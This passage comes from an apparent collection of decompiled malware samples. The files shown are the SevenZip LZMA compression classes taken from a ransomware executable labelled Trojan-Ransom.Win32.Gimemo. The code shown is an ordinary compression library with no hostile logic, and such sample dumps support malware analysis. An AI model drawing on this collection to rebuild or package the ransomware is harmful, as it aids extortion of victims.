this.kMinMatchCheck = 3U;
this.kFixHashSize = 0U;
}
}
public new void SetStream(Stream stream) => base.SetStream(stream);
public new void ReleaseStream() => base.ReleaseStream();
public new void Init()
{
base.Init();
for (uint index = 0; index < this._hashSizeSum; ++index)
this._hash[(IntPtr) index] = 0U;
this._cyclicBufferPos = 0U;
this.ReduceOffsets(-1);
}
public new void MovePos()
{
if (++this._cyclicBufferPos >= this._cyclicBufferSize)
this._cyclicBufferPos = 0U;
base.MovePos();
if (this._pos != (uint) int.MaxValue)
return;
this.Normalize();
}
public new byte GetIndexByte(int index) => base.GetIndexByte(index);
public new uint GetMatchLen(int index, uint distance, uint limit) => base.GetMatchLen(index, distance, limit);
public new uint GetNumAvailableBytes() => base.GetNumAvailableBytes();
public void Create(
uint historySize,
uint keepAddBufferBefore,
uint matchMaxLen,
uint keepAddBufferAfter)
{
if (historySize > 2147483391U)
throw new Exception();
this._cutValue = 16U + (matchMaxLen >> 1);
uint keepSizeReserv = (historySize + keepAddBufferBefore + matchMaxLen + keepAddBufferAfter) / 2U + 256U;
this.Create(historySize + keepAddBufferBefore, matchMaxLen + keepAddBufferAfter, keepSizeReserv);
this._matchMaxLen = matchMaxLen;
uint num1 = historySize + 1U;
if ((int) this._cyclicBufferSize != (int) num1)
this._son = new uint[(IntPtr) ((this._cyclicBufferSize = num1) * 2U)];
uint num2 = 65536;
if (this.HASH_ARRAY)
{
uint num3 = historySize - 1U;
uint num4 = num3 | num3 >> 1;
uint num5 = num4 | num4 >> 2;
uint num6 = num5 | num5 >> 4;
uint num7 = (num6 | num6 >> 8) >> 1 | (uint) ushort.MaxValue;
if (num7 > 16777216U)
num7 >>= 1;
this._hashMask = num7;
num2 = num7 + 1U + this.kFixHashSize;
}
if ((int) num2 == (int) this._hashSizeSum)
return;
this._hash = new uint[(IntPtr) (this._hashSizeSum = num2)];
}
public uint GetMatches(uint[] distances)
{
uint num1;
if (this._pos + this._matchMaxLen <= this._streamPos)
{
num1 = this._matchMaxLen;
}
else
{
num1 = this._streamPos - this._pos;
if (num1 < this.kMinMatchCheck)
{
this.MovePos();
return 0;
}
}
uint matches = 0;
uint num2 = this._pos > this._cyclicBufferSize ? this._pos - this._cyclicBufferSize : 0U;
uint index1 = this._bufferOffset + this._pos;
uint num3 = 1;
uint index2 = 0;
uint num4 = 0;
uint num5;
if (this.HASH_ARRAY)
{
uint num6 = CRC.Table[(int) this._bufferBase[(IntPtr) index1]] ^ (uint) this._bufferBase[(IntPtr) (index1 + 1U)];
index2 = num6 & 1023U;
uint num7 = num6 ^ (uint) this._bufferBase[(IntPtr) (index1 + 2U)] << 8;
num4 = num7 & (uint) ushort.MaxValue;
num5 = (num7 ^ CRC.Table[(int) this._bufferBase[(IntPtr) (index1 + 3U)]] << 5) & this._hashMask;
}
else
num5 = (uint) this._bufferBase[(IntPtr) index1] ^ (uint) this._bufferBase[(IntPtr) (index1 + 1U)] << 8;
uint num8 = this._hash[(IntPtr) (this.kFixHashSize + num5)];
if (this.HASH_ARRAY)
{
uint num9 = this._hash[(IntPtr) index2];
uint num10 = this._hash[(IntPtr) (1024U + num4)];
this._hash[(IntPtr) index2] = this._pos;
this._hash[(IntPtr) (1024U + num4)] = this._pos;
if (num9 > num2 && (int) this._bufferBase[(IntPtr) (this._bufferOffset + num9)] == (int) this._bufferBase[(IntPtr) index1])
{
uint[] numArray1 = distances;
int num11 = (int) matches;
uint num12 = (uint) (num11 + 1);
uint index3 = (uint) num11;
int num13;
num3 = (uint) (num13 = 2);
numArray1[(IntPtr) index3] = (uint) num13;
uint[] numArray2 = distances;
int num14 = (int) num12;
matches = (uint) (num14 + 1);
uint index4 = (uint) num14;
int num15 = (int) this._pos - (int) num9 - 1;
numArray2[(IntPtr) index4] = (uint) num15;
}
if (num10 > num2 && (int) this._bufferBase[(IntPtr) (this._bufferOffset + num10)] == (int) this._bufferBase[(IntPtr) index1])
{
if ((int) num10 == (int) num9)
matches -= 2U;
uint[] numArray3 = distances;
int num16 = (int) matches;
uint num17 = (uint) (num16 + 1);
uint index5 = (uint) num16;
int num18;
num3 = (uint) (num18 = 3);
numArray3[(IntPtr) index5] = (uint) num18;
uint[] numArray4 = distances;
int num19 = (int) num17;
matches = (uint) (num19 + 1);
uint index6 = (uint) num19;
int num20 = (int) this._pos - (int) num10 - 1;
numArray4[(IntPtr) index6] = (uint) num20;
num9 = num10;
}
if (matches != 0U && (int) num9 == (int) num8)
{
matches -= 2U;
num3 = 1U;
}
}
this._hash[(IntPtr) (this.kFixHashSize + num5)] = this._pos;
uint index7 = (uint) (((int) this._cyclicBufferPos << 1) + 1);
uint index8 = this._cyclicBufferPos << 1;
uint val2;
uint val1 = val2 = this.kNumHashDirectBytes;
if (this.kNumHashDirectBytes != 0U && num8 > num2 && (int) this._bufferBase[(IntPtr) (this._bufferOffset + num8 + this.kNumHashDirectBytes)] != (int) this._bufferBase[(IntPtr) (index1 + this.kNumHashDirectBytes)])
{
uint[] numArray5 = distances;
int num21 = (int) matches;
uint num22 = (uint) (num21 + 1);
uint index9 = (uint) num21;
int numHashDirectBytes;
num3 = (uint) (numHashDirectBytes = (int) this.kNumHashDirectBytes);
numArray5[(IntPtr) index9] = (uint) numHashDirectBytes;
uint[] numArray6 = distances;
int num23 = (int) num22;
matches = (uint) (num23 + 1);
uint index10 = (uint) num23;
int num24 = (int) this._pos - (int) num8 - 1;
numArray6[(IntPtr) index10] = (uint) num24;
}
uint cutValue = this._cutValue;
while (num8 > num2 && cutValue-- != 0U)
{
uint num25 = this._pos - num8;
uint index11 = (uint) ((num25 <= this._cyclicBufferPos ? (int) this._cyclicBufferPos - (int) num25 : (int) this._cyclicBufferPos - (int) num25 + (int) this._cyclicBufferSize) << 1);
uint num26 = this._bufferOffset + num8;
uint num27 = Math.Min(val1, val2);
if ((int) this._bufferBase[(IntPtr) (num26 + num27)] == (int) this._bufferBase[(IntPtr) (index1 + num27)])
{
do
;
while ((int) ++num27 != (int) num1 && (int) this._bufferBase[(IntPtr) (num26 + num27)] == (int) this._bufferBase[(IntPtr) (index1 + num27)]);
if (num3 < num27)
{
uint[] numArray7 = distances;
int num28 = (int) matches;
uint num29 = (uint) (num28 + 1);
uint index12 = (uint) num28;
int num30;
num3 = (uint) (num30 = (int) num27);
numArray7[(IntPtr) index12] = (uint) num30;
uint[] numArray8 = distances;
int num31 = (int) num29;
matches = (uint) (num31 + 1);
uint index13 = (uint) num31;
int num32 = (int) num25 - 1;
numArray8[(IntPtr) index13] = (uint) num32;
if ((int) num27 == (int) num1)
{
this._son[(IntPtr) index8] = this._son[(IntPtr) index11];
this._son[(IntPtr) index7] = this._son[(IntPtr) (index11 + 1U)];
goto label_29;
}
}
}
if ((int) this._bufferBase[(IntPtr) (num26 + num27)] < (int) this._bufferBase[(IntPtr) (index1 + num27)])
{
this._son[(IntPtr) index8] = num8;
index8 = index11 + 1U;
num8 = this._son[(IntPtr) index8];
val2 = num27;
}
else
{
this._son[(IntPtr) index7] = num8;
index7 = index11;
num8 = this._son[(IntPtr) index7];
val1 = num27;
}
}
this._son[(IntPtr) index7] = this._son[(IntPtr) index8] = 0U;
label_29:
this.MovePos();
return matches;
}
public void Skip(uint num)
{
do
{
uint num1;
if (this._pos + this._matchMaxLen <= this._streamPos)
{
num1 = this._matchMaxLen;
}
else
{
num1 = this._streamPos - this._pos;
if (num1 < this.kMinMatchCheck)
{
this.MovePos();
goto label_19;
}
}
uint num2 = this._pos > this._cyclicBufferSize ? this._pos - this._cyclicBufferSize : 0U;
uint index1 = this._bufferOffset + this._pos;
uint num3;
if (this.HASH_ARRAY)
{
uint num4 = CRC.Table[(int) this._bufferBase[(IntPtr) index1]] ^ (uint) this._bufferBase[(IntPtr) (index1 + 1U)];
this._hash[(IntPtr) (num4 & 1023U)] = this._pos;
uint num5 = num4 ^ (uint) this._bufferBase[(IntPtr) (index1 + 2U)] << 8;
this._hash[(IntPtr) (1024U + (num5 & (uint) ushort.MaxValue))] = this._pos;
num3 = (num5 ^ CRC.Table[(int) this._bufferBase[(IntPtr) (index1 + 3U)]] << 5) & this._hashMask;
}
else
num3 = (uint) this._bufferBase[(IntPtr) index1] ^ (uint) this._bufferBase[(IntPtr) (index1 + 1U)] << 8;
uint num6 = this._hash[(IntPtr) (this.kFixHashSize + num3)];
this._hash[(IntPtr) (this.kFixHashSize + num3)] = this._pos;
uint index2 = (uint) (((int) this._cyclicBufferPos << 1) + 1);
uint index3 = this._cyclicBufferPos << 1;
uint val2;
uint val1 = val2 = this.kNumHashDirectBytes;
uint cutValue = this._cutValue;
while (num6 > num2 && cutValue-- != 0U)
{
uint num7 = this._pos - num6;
uint index4 = (uint) ((num7 <= this._cyclicBufferPos ? (int) this._cyclicBufferPos - (int) num7 : (int) this._cyclicBufferPos - (int) num7 + (int) this._cyclicBufferSize) << 1);
uint num8 = this._bufferOffset + num6;
uint num9 = Math.Min(val1, val2);
if ((int) this._bufferBase[(IntPtr) (num8 + num9)] == (int) this._bufferBase[(IntPtr) (index1 + num9)])
{
do
;
while ((int) ++num9 != (int) num1 && (int) this._bufferBase[(IntPtr) (num8 + num9)] == (int) this._bufferBase[(IntPtr) (index1 + num9)]);
if ((int) num9 == (int) num1)
{
this._son[(IntPtr) index3] = this._son[(IntPtr) index4];
this._son[(IntPtr) index2] = this._son[(IntPtr) (index4 + 1U)];
goto label_18;
}
}
if ((int) this._bufferBase[(IntPtr) (num8 + num9)] < (int) this._bufferBase[(IntPtr) (index1 + num9)])
{
this._son[(IntPtr) index3] = num6;
index3 = index4 + 1U;
num6 = this._son[(IntPtr) index3];
val2 = num9;
}
else
{
this._son[(IntPtr) index2] = num6;
index2 = index4;
num6 = this._son[(IntPtr) index2];
val1 = num9;
}
}
this._son[(IntPtr) index2] = this._son[(IntPtr) index3] = 0U;
label_18:
this.MovePos();
label_19:;
}
while (--num != 0U);
}
private void NormalizeLinks(uint[] items, uint numItems, uint subValue)
{
for (uint index = 0; index < numItems; ++index)
{
uint num1 = items[(IntPtr) index];
uint num2 = num1 > subValue ? num1 - subValue : 0U;
items[(IntPtr) index] = num2;
}
}
private void Normalize()
{
uint subValue = this._pos - this._cyclicBufferSize;
this.NormalizeLinks(this._son, this._cyclicBufferSize * 2U, subValue);
this.NormalizeLinks(this._hash, this._hashSizeSum, subValue);
this.ReduceOffsets((int) subValue);
}
public void SetCutValue(uint cutValue) => this._cutValue = cutValue;
}
}
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-7cb020d260d835f80919399a58563918f73757689e39ba851e89cc00a05535da/Compression/LZ/IInWindowStream.cs
+25
View File
@@ -0,0 +1,25 @@
// Decompiled with JetBrains decompiler
// Type: SevenZip.Compression.LZ.IInWindowStream
// Assembly: crypted, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 316F25AB-9DC5-41B1-B1CB-0BB9D97AEA6A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Gimemo.ayt-7cb020d260d835f80919399a58563918f73757689e39ba851e89cc00a05535da.exe
using System.IO;
namespace SevenZip.Compression.LZ
{
internal interface IInWindowStream
{
void SetStream(Stream inStream);
void Init();
void ReleaseStream();
byte GetIndexByte(int index);
uint GetMatchLen(int index, uint distance, uint limit);
uint GetNumAvailableBytes();
}
}
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-7cb020d260d835f80919399a58563918f73757689e39ba851e89cc00a05535da/Compression/LZ/IMatchFinder.cs
+21
View File
@@ -0,0 +1,21 @@
// Decompiled with JetBrains decompiler
// Type: SevenZip.Compression.LZ.IMatchFinder
// Assembly: crypted, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 316F25AB-9DC5-41B1-B1CB-0BB9D97AEA6A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Gimemo.ayt-7cb020d260d835f80919399a58563918f73757689e39ba851e89cc00a05535da.exe
namespace SevenZip.Compression.LZ
{
internal interface IMatchFinder : IInWindowStream
{
void Create(
uint historySize,
uint keepAddBufferBefore,
uint matchMaxLen,
uint keepAddBufferAfter);
uint GetMatches(uint[] distances);
void Skip(uint num);
}
}
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-7cb020d260d835f80919399a58563918f73757689e39ba851e89cc00a05535da/Compression/LZ/InWindow.cs
+127
View File
@@ -0,0 +1,127 @@
// Decompiled with JetBrains decompiler
// Type: SevenZip.Compression.LZ.InWindow
// Assembly: crypted, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 316F25AB-9DC5-41B1-B1CB-0BB9D97AEA6A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Gimemo.ayt-7cb020d260d835f80919399a58563918f73757689e39ba851e89cc00a05535da.exe
using System;
using System.IO;
namespace SevenZip.Compression.LZ
{
public class InWindow
{
public byte[] _bufferBase;
private Stream _stream;
private uint _posLimit;
private bool _streamEndWasReached;
private uint _pointerToLastSafePosition;
public uint _bufferOffset;
public uint _blockSize;
public uint _pos;
private uint _keepSizeBefore;
private uint _keepSizeAfter;
public uint _streamPos;
public void MoveBlock()
{
uint num1 = this._bufferOffset + this._pos - this._keepSizeBefore;
if (num1 > 0U)
--num1;
uint num2 = this._bufferOffset + this._streamPos - num1;
for (uint index = 0; index < num2; ++index)
this._bufferBase[(IntPtr) index] = this._bufferBase[(IntPtr) (num1 + index)];
this._bufferOffset -= num1;
}
public virtual void ReadBlock()
{
if (this._streamEndWasReached)
return;
while (true)
{
do
{
int count = -(int) this._bufferOffset + (int) this._blockSize - (int) this._streamPos;
if (count == 0)
return;
int num = this._stream.Read(this._bufferBase, (int) this._bufferOffset + (int) this._streamPos, count);
if (num == 0)
{
this._posLimit = this._streamPos;
if (this._bufferOffset + this._posLimit > this._pointerToLastSafePosition)
this._posLimit = this._pointerToLastSafePosition - this._bufferOffset;
this._streamEndWasReached = true;
return;
}
this._streamPos += (uint) num;
}
while (this._streamPos < this._pos + this._keepSizeAfter);
this._posLimit = this._streamPos - this._keepSizeAfter;
}
}
private void Free() => this._bufferBase = (byte[]) null;
public void Create(uint keepSizeBefore, uint keepSizeAfter, uint keepSizeReserv)
{
this._keepSizeBefore = keepSizeBefore;
this._keepSizeAfter = keepSizeAfter;
uint num = keepSizeBefore + keepSizeAfter + keepSizeReserv;
if (this._bufferBase == null || (int) this._blockSize != (int) num)
{
this.Free();
this._blockSize = num;
this._bufferBase = new byte[(IntPtr) this._blockSize];
}
this._pointerToLastSafePosition = this._blockSize - keepSizeAfter;
}
public void SetStream(Stream stream) => this._stream = stream;
public void ReleaseStream() => this._stream = (Stream) null;
public void Init()
{
this._bufferOffset = 0U;
this._pos = 0U;
this._streamPos = 0U;
this._streamEndWasReached = false;
this.ReadBlock();
}
public void MovePos()
{
++this._pos;
if (this._pos <= this._posLimit)
return;
if (this._bufferOffset + this._pos > this._pointerToLastSafePosition)
this.MoveBlock();
this.ReadBlock();
}
public byte GetIndexByte(int index) => this._bufferBase[(long) (this._bufferOffset + this._pos) + (long) index];
public uint GetMatchLen(int index, uint distance, uint limit)
{
if (this._streamEndWasReached && (long) this._pos + (long) index + (long) limit > (long) this._streamPos)
limit = this._streamPos - (uint) ((ulong) this._pos + (ulong) index);
++distance;
uint num = (uint) ((int) this._bufferOffset + (int) this._pos + index);
uint matchLen = 0;
while (matchLen < limit && (int) this._bufferBase[(IntPtr) (num + matchLen)] == (int) this._bufferBase[(IntPtr) (num + matchLen - distance)])
++matchLen;
return matchLen;
}
public uint GetNumAvailableBytes() => this._streamPos - this._pos;
public void ReduceOffsets(int subValue)
{
this._bufferOffset += (uint) subValue;
this._posLimit -= (uint) subValue;
this._pos -= (uint) subValue;
this._streamPos -= (uint) subValue;
}
}
}
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-7cb020d260d835f80919399a58563918f73757689e39ba851e89cc00a05535da/Compression/LZ/OutWindow.cs
+113
View File
@@ -0,0 +1,113 @@
// Decompiled with JetBrains decompiler
// Type: SevenZip.Compression.LZ.OutWindow
// Assembly: crypted, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 316F25AB-9DC5-41B1-B1CB-0BB9D97AEA6A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Gimemo.ayt-7cb020d260d835f80919399a58563918f73757689e39ba851e89cc00a05535da.exe
using System;
using System.IO;
namespace SevenZip.Compression.LZ
{
public class OutWindow
{
private byte[] _buffer;
private uint _pos;
private uint _windowSize;
private uint _streamPos;
private Stream _stream;
public uint TrainSize;
public void Create(uint windowSize)
{
if ((int) this._windowSize != (int) windowSize)
this._buffer = new byte[(IntPtr) windowSize];
this._windowSize = windowSize;
this._pos = 0U;
this._streamPos = 0U;
}
public void Init(Stream stream, bool solid)
{
this.ReleaseStream();
this._stream = stream;
if (solid)
return;
this._streamPos = 0U;
this._pos = 0U;
this.TrainSize = 0U;
}
public bool Train(Stream stream)
{
long length = stream.Length;
uint num1 = length < (long) this._windowSize ? (uint) length : this._windowSize;
this.TrainSize = num1;
stream.Position = length - (long) num1;
this._streamPos = this._pos = 0U;
while (num1 > 0U)
{
uint count = this._windowSize - this._pos;
if (num1 < count)
count = num1;
int num2 = stream.Read(this._buffer, (int) this._pos, (int) count);
if (num2 == 0)
return false;
num1 -= (uint) num2;
this._pos += (uint) num2;
this._streamPos += (uint) num2;
if ((int) this._pos == (int) this._windowSize)
this._streamPos = this._pos = 0U;
}
return true;
}
public void ReleaseStream()
{
this.Flush();
this._stream = (Stream) null;
}
public void Flush()
{
uint count = this._pos - this._streamPos;
if (count == 0U)
return;
this._stream.Write(this._buffer, (int) this._streamPos, (int) count);
if (this._pos >= this._windowSize)
this._pos = 0U;
this._streamPos = this._pos;
}
public void CopyBlock(uint distance, uint len)
{
uint num = (uint) ((int) this._pos - (int) distance - 1);
if (num >= this._windowSize)
num += this._windowSize;
for (; len > 0U; --len)
{
if (num >= this._windowSize)
num = 0U;
this._buffer[(IntPtr) this._pos++] = this._buffer[(IntPtr) num++];
if (this._pos >= this._windowSize)
this.Flush();
}
}
public void PutByte(byte b)
{
this._buffer[(IntPtr) this._pos++] = b;
if (this._pos < this._windowSize)
return;
this.Flush();
}
public byte GetByte(uint distance)
{
uint index = (uint) ((int) this._pos - (int) distance - 1);
if (index >= this._windowSize)
index += this._windowSize;
return this._buffer[(IntPtr) index];
}
}
}
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-7cb020d260d835f80919399a58563918f73757689e39ba851e89cc00a05535da/Compression/LZMA/Base.cs
+70
View File
@@ -0,0 +1,70 @@
// Decompiled with JetBrains decompiler
// Type: SevenZip.Compression.LZMA.Base
// Assembly: crypted, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 316F25AB-9DC5-41B1-B1CB-0BB9D97AEA6A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Gimemo.ayt-7cb020d260d835f80919399a58563918f73757689e39ba851e89cc00a05535da.exe
namespace SevenZip.Compression.LZMA
{
internal abstract class Base
{
public const uint kNumRepDistances = 4;
public const uint kNumStates = 12;
public const int kNumPosSlotBits = 6;
public const int kDicLogSizeMin = 0;
public const int kNumLenToPosStatesBits = 2;
public const uint kNumLenToPosStates = 4;
public const uint kMatchMinLen = 2;
public const int kNumAlignBits = 4;
public const uint kAlignTableSize = 16;
public const uint kAlignMask = 15;
public const uint kStartPosModelIndex = 4;
public const uint kEndPosModelIndex = 14;
public const uint kNumPosModels = 10;
public const uint kNumFullDistances = 128;
public const uint kNumLitPosStatesBitsEncodingMax = 4;
public const uint kNumLitContextBitsMax = 8;
public const int kNumPosStatesBitsMax = 4;
public const uint kNumPosStatesMax = 16;
public const int kNumPosStatesBitsEncodingMax = 4;
public const uint kNumPosStatesEncodingMax = 16;
public const int kNumLowLenBits = 3;
public const int kNumMidLenBits = 3;
public const int kNumHighLenBits = 8;
public const uint kNumLowLenSymbols = 8;
public const uint kNumMidLenSymbols = 8;
public const uint kNumLenSymbols = 272;
public const uint kMatchMaxLen = 273;
public static uint GetLenToPosState(uint len)
{
len -= 2U;
return len < 4U ? len : 3U;
}
public struct State
{
public uint Index;
public void Init() => this.Index = 0U;
public void UpdateChar()
{
if (this.Index < 4U)
this.Index = 0U;
else if (this.Index < 10U)
this.Index -= 3U;
else
this.Index -= 6U;
}
public void UpdateMatch() => this.Index = this.Index < 7U ? 7U : 10U;
public void UpdateRep() => this.Index = this.Index < 7U ? 8U : 11U;
public void UpdateShortRep() => this.Index = this.Index < 7U ? 9U : 11U;
public bool IsCharState() => this.Index < 7U;
}
}
}
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-7cb020d260d835f80919399a58563918f73757689e39ba851e89cc00a05535da/Compression/LZMA/Decoder.cs
+353
View File
@@ -0,0 +1,353 @@
// Decompiled with JetBrains decompiler
// Type: SevenZip.Compression.LZMA.Decoder
// Assembly: crypted, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 316F25AB-9DC5-41B1-B1CB-0BB9D97AEA6A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Gimemo.ayt-7cb020d260d835f80919399a58563918f73757689e39ba851e89cc00a05535da.exe
using SevenZip.Compression.LZ;
using SevenZip.Compression.RangeCoder;
using System;
using System.IO;
namespace SevenZip.Compression.LZMA
{
public class Decoder : ICoder, ISetDecoderProperties
{
private OutWindow m_OutWindow = new OutWindow();
private SevenZip.Compression.RangeCoder.Decoder m_RangeDecoder = new SevenZip.Compression.RangeCoder.Decoder();
private BitDecoder[] m_IsMatchDecoders = new BitDecoder[new IntPtr(192)];
private BitDecoder[] m_IsRepDecoders = new BitDecoder[new IntPtr(12)];
private BitDecoder[] m_IsRepG0Decoders = new BitDecoder[new IntPtr(12)];
private BitDecoder[] m_IsRepG1Decoders = new BitDecoder[new IntPtr(12)];
private BitDecoder[] m_IsRepG2Decoders = new BitDecoder[new IntPtr(12)];
private BitDecoder[] m_IsRep0LongDecoders = new BitDecoder[new IntPtr(192)];
private BitTreeDecoder[] m_PosSlotDecoder = new BitTreeDecoder[new IntPtr(4)];
private BitDecoder[] m_PosDecoders = new BitDecoder[new IntPtr(114)];
private BitTreeDecoder m_PosAlignDecoder = new BitTreeDecoder(4);
private Decoder.LenDecoder m_LenDecoder = new Decoder.LenDecoder();
private Decoder.LenDecoder m_RepLenDecoder = new Decoder.LenDecoder();
private Decoder.LiteralDecoder m_LiteralDecoder = new Decoder.LiteralDecoder();
private uint m_DictionarySize;
private uint m_DictionarySizeCheck;
private uint m_PosStateMask;
private bool _solid;
public Decoder()
{
this.m_DictionarySize = uint.MaxValue;
for (int index = 0; index < 4; ++index)
this.m_PosSlotDecoder[index] = new BitTreeDecoder(6);
}
private void SetDictionarySize(uint dictionarySize)
{
if ((int) this.m_DictionarySize == (int) dictionarySize)
return;
this.m_DictionarySize = dictionarySize;
this.m_DictionarySizeCheck = Math.Max(this.m_DictionarySize, 1U);
this.m_OutWindow.Create(Math.Max(this.m_DictionarySizeCheck, 4096U));
}
private void SetLiteralProperties(int lp, int lc)
{
if (lp > 8)
throw new InvalidParamException();
if (lc > 8)
throw new InvalidParamException();
this.m_LiteralDecoder.Create(lp, lc);
}
private void SetPosBitsProperties(int pb)
{
if (pb > 4)
throw new InvalidParamException();
uint numPosStates = (uint) (1 << pb);
this.m_LenDecoder.Create(numPosStates);
this.m_RepLenDecoder.Create(numPosStates);
this.m_PosStateMask = numPosStates - 1U;
}
private void Init(Stream inStream, Stream outStream)
{
this.m_RangeDecoder.Init(inStream);
this.m_OutWindow.Init(outStream, this._solid);
for (uint index1 = 0; index1 < 12U; ++index1)
{
for (uint index2 = 0; index2 <= this.m_PosStateMask; ++index2)
{
uint index3 = (index1 << 4) + index2;
this.m_IsMatchDecoders[(IntPtr) index3].Init();
this.m_IsRep0LongDecoders[(IntPtr) index3].Init();
}
this.m_IsRepDecoders[(IntPtr) index1].Init();
this.m_IsRepG0Decoders[(IntPtr) index1].Init();
this.m_IsRepG1Decoders[(IntPtr) index1].Init();
this.m_IsRepG2Decoders[(IntPtr) index1].Init();
}
this.m_LiteralDecoder.Init();
for (uint index = 0; index < 4U; ++index)
this.m_PosSlotDecoder[(IntPtr) index].Init();
for (uint index = 0; index < 114U; ++index)
this.m_PosDecoders[(IntPtr) index].Init();
this.m_LenDecoder.Init();
this.m_RepLenDecoder.Init();
this.m_PosAlignDecoder.Init();
}
public void Code(
Stream inStream,
Stream outStream,
long inSize,
long outSize,
ICodeProgress progress)
{
this.Init(inStream, outStream);
Base.State state = new Base.State();
state.Init();
uint distance = 0;
uint num1 = 0;
uint num2 = 0;
uint num3 = 0;
ulong pos = 0;
ulong num4 = (ulong) outSize;
if (pos < num4)
{
if (this.m_IsMatchDecoders[(IntPtr) (state.Index << 4)].Decode(this.m_RangeDecoder) != 0U)
throw new DataErrorException();
state.UpdateChar();
this.m_OutWindow.PutByte(this.m_LiteralDecoder.DecodeNormal(this.m_RangeDecoder, 0U, (byte) 0));
++pos;
}
while (pos < num4)
{
uint posState = (uint) pos & this.m_PosStateMask;
if (this.m_IsMatchDecoders[(IntPtr) ((state.Index << 4) + posState)].Decode(this.m_RangeDecoder) == 0U)
{
byte prevByte = this.m_OutWindow.GetByte(0U);
this.m_OutWindow.PutByte(state.IsCharState() ? this.m_LiteralDecoder.DecodeNormal(this.m_RangeDecoder, (uint) pos, prevByte) : this.m_LiteralDecoder.DecodeWithMatchByte(this.m_RangeDecoder, (uint) pos, prevByte, this.m_OutWindow.GetByte(distance)));
state.UpdateChar();
++pos;
}
else
{
uint len;
if (this.m_IsRepDecoders[(IntPtr) state.Index].Decode(this.m_RangeDecoder) == 1U)
{
if (this.m_IsRepG0Decoders[(IntPtr) state.Index].Decode(this.m_RangeDecoder) == 0U)
{
if (this.m_IsRep0LongDecoders[(IntPtr) ((state.Index << 4) + posState)].Decode(this.m_RangeDecoder) == 0U)
{
state.UpdateShortRep();
this.m_OutWindow.PutByte(this.m_OutWindow.GetByte(distance));
++pos;
continue;
}
}
else
{
uint num5;
if (this.m_IsRepG1Decoders[(IntPtr) state.Index].Decode(this.m_RangeDecoder) == 0U)
{
num5 = num1;
}
else
{
if (this.m_IsRepG2Decoders[(IntPtr) state.Index].Decode(this.m_RangeDecoder) == 0U)
{
num5 = num2;
}
else
{
num5 = num3;
num3 = num2;
}
num2 = num1;
}
num1 = distance;
distance = num5;
}
len = this.m_RepLenDecoder.Decode(this.m_RangeDecoder, posState) + 2U;
state.UpdateRep();
}
else
{
num3 = num2;
num2 = num1;
num1 = distance;
len = 2U + this.m_LenDecoder.Decode(this.m_RangeDecoder, posState);
state.UpdateMatch();
uint num6 = this.m_PosSlotDecoder[(IntPtr) Base.GetLenToPosState(len)].Decode(this.m_RangeDecoder);
if (num6 >= 4U)
{
int NumBitLevels = (int) (num6 >> 1) - 1;
uint num7 = (uint) ((2 | (int) num6 & 1) << NumBitLevels);
distance = num6 >= 14U ? num7 + (this.m_RangeDecoder.DecodeDirectBits(NumBitLevels - 4) << 4) + this.m_PosAlignDecoder.ReverseDecode(this.m_RangeDecoder) : num7 + BitTreeDecoder.ReverseDecode(this.m_PosDecoders, (uint) ((int) num7 - (int) num6 - 1), this.m_RangeDecoder, NumBitLevels);
}
else
distance = num6;
}
if ((ulong) distance >= (ulong) this.m_OutWindow.TrainSize + pos || distance >= this.m_DictionarySizeCheck)
{
if (distance != uint.MaxValue)
throw new DataErrorException();
break;
}
this.m_OutWindow.CopyBlock(distance, len);
pos += (ulong) len;
}
}
this.m_OutWindow.Flush();
this.m_OutWindow.ReleaseStream();
this.m_RangeDecoder.ReleaseStream();
}
public void SetDecoderProperties(byte[] properties)
{
if (properties.Length < 5)
throw new InvalidParamException();
int lc = (int) properties[0] % 9;
int num = (int) properties[0] / 9;
int lp = num % 5;
int pb = num / 5;
if (pb > 4)
throw new InvalidParamException();
uint dictionarySize = 0;
for (int index = 0; index < 4; ++index)
dictionarySize += (uint) properties[1 + index] << index * 8;
this.SetDictionarySize(dictionarySize);
this.SetLiteralProperties(lp, lc);
this.SetPosBitsProperties(pb);
}
public bool Train(Stream stream)
{
this._solid = true;
return this.m_OutWindow.Train(stream);
}
private class LenDecoder
{
private BitDecoder m_Choice = new BitDecoder();
private BitDecoder m_Choice2 = new BitDecoder();
private BitTreeDecoder[] m_LowCoder = new BitTreeDecoder[new IntPtr(16)];
private BitTreeDecoder[] m_MidCoder = new BitTreeDecoder[new IntPtr(16)];
private BitTreeDecoder m_HighCoder = new BitTreeDecoder(8);
private uint m_NumPosStates;
public void Create(uint numPosStates)
{
for (uint numPosStates1 = this.m_NumPosStates; numPosStates1 < numPosStates; ++numPosStates1)
{
this.m_LowCoder[(IntPtr) numPosStates1] = new BitTreeDecoder(3);
this.m_MidCoder[(IntPtr) numPosStates1] = new BitTreeDecoder(3);
}
this.m_NumPosStates = numPosStates;
}
public void Init()
{
this.m_Choice.Init();
for (uint index = 0; index < this.m_NumPosStates; ++index)
{
this.m_LowCoder[(IntPtr) index].Init();
this.m_MidCoder[(IntPtr) index].Init();
}
this.m_Choice2.Init();
this.m_HighCoder.Init();
}
public uint Decode(SevenZip.Compression.RangeCoder.Decoder rangeDecoder, uint posState)
{
if (this.m_Choice.Decode(rangeDecoder) == 0U)
return this.m_LowCoder[(IntPtr) posState].Decode(rangeDecoder);
